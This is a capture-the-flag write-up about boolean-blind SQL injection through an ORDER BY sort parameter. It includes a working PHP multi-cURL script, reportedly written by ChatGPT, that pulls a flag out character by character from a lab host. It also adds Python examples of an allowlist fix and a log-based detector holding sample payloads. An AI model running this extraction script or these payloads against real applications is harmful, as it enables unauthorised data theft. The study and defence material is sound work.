The banner shows this is a SQLi problem. There is a simple site on port 80, so I looked for the SQLi there and found it.
The table has 4 columns.
I couldn't get credentials with Sqlmap, so I had to do it with boolean-based blind. 😥
I really wanted to build the payload so that the response code or Content-Length would differ between True and False, but I couldn't: both True and False return the same Length, so the body content has to be inspected (this is where the hell starts). UNION SELECT didn't work either. 😞
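The reason a CASE expression can swap the sort key at all is that the application splices the ?order= value straight into ORDER BY. The following Python example is added to this write-up (it is not from the original post or the target application) and shows that vulnerable pattern next to the allowlist fix against an in-memory SQLite database; the todos schema beyond the title and date columns, the sample rows and the ALLOWED_ORDER map are constructed for the example.

```python
import sqlite3

# Constructed sample schema: the write-up only names the todos table and its
# title/date columns, so the other two columns and the rows are assumptions.
SCHEMA = """
CREATE TABLE todos (id INTEGER PRIMARY KEY, title TEXT, date TEXT, done INTEGER);
INSERT INTO todos (title, date, done) VALUES
    ('write report', '2023-08-01', 0),
    ('buy milk',     '2023-07-30', 1),
    ('call Alice',   '2023-08-03', 0);
"""

# Columns the application is willing to sort by. Only these fixed identifiers
# ever reach the SQL text; the user's string is just a lookup key.
ALLOWED_ORDER = {"id": "id", "title": "title", "date": "date"}


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_todos_vulnerable(conn, order):
    # The pattern behind the write-up: the ?order= value is interpolated into
    # ORDER BY verbatim, so any SQL expression (CASE ... END, a subquery) becomes
    # part of the query and the row order leaks whatever it evaluates to.
    sql = f"SELECT title, date FROM todos ORDER BY {order}"
    return conn.execute(sql).fetchall()


def list_todos_safe(conn, order, direction="asc"):
    # ORDER BY cannot take a bound parameter, so the fix is an allowlist: map the
    # user-supplied name to a fixed column identifier and reject anything else.
    column = ALLOWED_ORDER.get(order)
    if column is None:
        raise ValueError(f"unsupported sort column: {order!r}")
    if direction.lower() not in ("asc", "desc"):
        raise ValueError(f"unsupported sort direction: {direction!r}")
    sql = f"SELECT title, date FROM todos ORDER BY {column} {direction.upper()}"
    return conn.execute(sql).fetchall()


def order_is_accepted(order):
    # True if the hardened endpoint would run a query for this ?order= value.
    try:
        list_todos_safe(connect(), order)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    conn = connect()
    print(list_todos_safe(conn, "date"))
    print(order_is_accepted("title"))
    print(order_is_accepted("(CASE WHEN 1=1 THEN title ELSE date END)"))
```

The allowlist also closes the Content-Length angle the post mentions: since every accepted value yields one of three fixed queries, there is no expression left for the attacker to make the response depend on.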
For checking SQL: https://sqliteonline.com/
Run Intruder one character at a time and identify each character from the response.
If you go through all of it, you'll see that the other table is named todos and has 4 columns; flag has 1 column.
Get the flag value the same way.
🚩 Congratulations! Thank you for your time, Happy hacking. 🌕🍡🌕🍡🌕🍡
This time I used multi cURL to speed things up. Once again I had ChatGPT write it for me. Thanks.
<?php
echo "------ START ----- \n";
$flag = "";
$FLAGLEN = 38;                 // number of flag characters to recover
$URL = 'http://10.10.143.81/';
$SEARCHDATE = '2023-08-01';    // marker row used to tell the two orderings apart
$SEARCHDATELEN = 101;          // line on which the marker row appears when the condition is FALSE
$strings = array(
    "0","1","2","3","4","5","6","7","8","9",
    "a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z",
    "A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z",
    "!","#","$","%","&","(",")","~","=","|","^","-","`","{","[","@","]","}","*",":",";","+","<",">","%20",".",
    "?","_" );
for ($i = 0; $i < $FLAGLEN; $i++) {
    // Build one query string per candidate character for position $i + 1
    $prm = array();
    for ($j = 0; $j < count($strings); $j++) {
        $prm[$j] = '?order=(CASE+WHEN(SUBSTRING((SELECT+*+FROM+flag),' . ($i + 1) . ',1)=%27' . $strings[$j] . '%27)+THEN+title+ELSE+date+END)';
    }
    // cURL
    $mh = curl_multi_init(); // initialize the cURL multi handle
    $handles = array();
    // Create a cURL handle for each URL and add it to the multi handle
    foreach ($prm as $p) {
        $ch = curl_init($URL . $p);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_multi_add_handle($mh, $ch);
        $handles[] = $ch;
    }
    // Run all requests concurrently through the multi handle
    $running = null;
    do {
        $status = curl_multi_exec($mh, $running);
        if ($running > 0) {
            curl_multi_select($mh); // wait for socket activity instead of busy-looping
        }
    } while ($running > 0 && $status == CURLM_OK);
    // Process each response
    foreach ($handles as $ch) {
        $response = curl_multi_getcontent($ch);
        // Split the response into lines
        $responseLines = explode("\n", $response);
        // Look for the marker date "2023-08-01" on each line
        foreach ($responseLines as $lineNumber => $line) {
            if (strpos($line, $SEARCHDATE) !== false) {
                $target = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
                //$target = http://10.10.143.81/?order=(CASE+WHEN(SUBSTRING((SELECT+*+FROM+flag),1,1)=%27c%27)+THEN+title+ELSE+date+END)
                //echo 'URL: ' . $target . ' line: ' . $lineNumber . "\n";
                if ($lineNumber != $SEARCHDATELEN) {
                    // The marker moved, so the comparison was TRUE: cut the guessed character out of the URL
                    // (capture group handles multi-character entries such as %20 as well)
                    if (preg_match('/%27(.*?)%27\)/', $target, $char)) {
                        $str = urldecode($char[1]);
                        echo $str;
                        $flag = $flag . $str;
                    }
                }
            }
        }
        curl_multi_remove_handle($mh, $ch);
        curl_close($ch);
    }
    curl_multi_close($mh);
}
//echo "FLAG:" . $flag . "\n";
echo "\n------ END ------- \n";
?>
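Seen from the server side, a per-character blind extraction like the script above leaves a very recognisable trace: one request per candidate character from the same client, each carrying SQL syntax in a parameter that should only ever hold a column name. The Python below is an added example (not from the original post and not the ChatGPT script) that parses constructed access-log lines in common log format, flags ?order= values that are not allowlisted column names and contain SQL fragments, and counts those probes per client IP. The log lines, the IPs and the ALLOWED_ORDER set are assumptions made for the example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (sample data for this example, not from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2023:10:00:01 +0000] "GET /?order=title HTTP/1.1" 200 5120
10.0.0.9 - - [01/Aug/2023:10:00:02 +0000] "GET /?order=(CASE+WHEN(SUBSTRING((SELECT+*+FROM+flag),1,1)=%27a%27)+THEN+title+ELSE+date+END) HTTP/1.1" 200 5120
10.0.0.9 - - [01/Aug/2023:10:00:02 +0000] "GET /?order=(CASE+WHEN(SUBSTRING((SELECT+*+FROM+flag),1,1)=%27b%27)+THEN+title+ELSE+date+END) HTTP/1.1" 200 5120
10.0.0.9 - - [01/Aug/2023:10:00:02 +0000] "GET /?order=(CASE+WHEN(SUBSTRING((SELECT+*+FROM+flag),1,1)=%27c%27)+THEN+title+ELSE+date+END) HTTP/1.1" 200 5120
10.0.0.5 - - [01/Aug/2023:10:00:07 +0000] "GET /?order=date HTTP/1.1" 200 5120
10.0.0.9 - - [01/Aug/2023:10:00:08 +0000] "GET /?order=title%3BSELECT+1 HTTP/1.1" 200 5120
"""

# Common log format: client, identity, user, [timestamp], "METHOD path proto", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# SQL keywords and punctuation that have no business in a sort-column parameter.
SQL_TOKENS = re.compile(
    r"\b(case|when|then|else|end|select|union|from|substr(ing)?)\b|[();]",
    re.IGNORECASE,
)

# Sort columns the application legitimately accepts (assumed for the example).
ALLOWED_ORDER = {"id", "title", "date"}


def parse_line(line):
    """Return a dict with ip, ts, path and the decoded ?order= values, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # parse_qs turns '+' into spaces and decodes %27 etc., so we inspect the
    # same string the database would have seen.
    query = parse_qs(urlsplit(rec["path"]).query, keep_blank_values=True)
    rec["order"] = query.get("order", [])
    return rec


def is_suspicious_order(value):
    # An allowlisted column name is fine; anything containing SQL syntax is not.
    if value in ALLOWED_ORDER:
        return False
    return SQL_TOKENS.search(value) is not None


def find_injection_attempts(log_text):
    """(ip, timestamp, decoded order value) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for value in rec["order"]:
            if is_suspicious_order(value):
                hits.append((rec["ip"], rec["ts"], value))
    return hits


def probes_per_ip(hits):
    # Blind extraction needs one request per candidate character, so the same
    # client repeating near-identical payloads is the tell; a single stray
    # request is usually noise and a volume threshold keeps alerts quiet.
    return Counter(ip for ip, _, _ in hits)


if __name__ == "__main__":
    hits = find_injection_attempts(SAMPLE_LOG)
    for ip, ts, value in hits:
        print(ip, ts, value)
    print(probes_per_ip(hits))
```

The per-IP counter is what turns this from a noisy keyword match into a usable alert: one CASE expression in a parameter is worth a look, but dozens per second from one address, differing only in the quoted character, is the signature of exactly the loop in the PHP script above.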